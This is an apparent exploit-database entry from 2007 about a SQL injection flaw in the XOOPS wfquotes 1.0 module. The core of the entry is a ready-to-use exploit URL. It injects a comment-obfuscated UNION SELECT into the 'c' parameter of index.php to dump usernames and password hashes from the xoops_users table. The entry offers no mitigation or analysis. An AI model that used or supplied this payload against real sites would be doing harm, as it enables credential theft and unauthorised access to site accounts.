id: 1839
date: 05/05/2007
title: XOOPS Module wfquotes 1.0 0 Remote SQL Injection Vulnerability
author: xoron
cves: 

==============================================================
XOOPS Module wfquotes 1.0 0 Remote SQL Injection Vulnerability
==============================================================




=================================================
+
+ Xoops wfquotes module v1.0 0 Remote Blind SQL Injection
+
+
=================================================
+
+ Exploit:
+ /modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*
+
=================================================



#  0day.today [2023-03-24]  #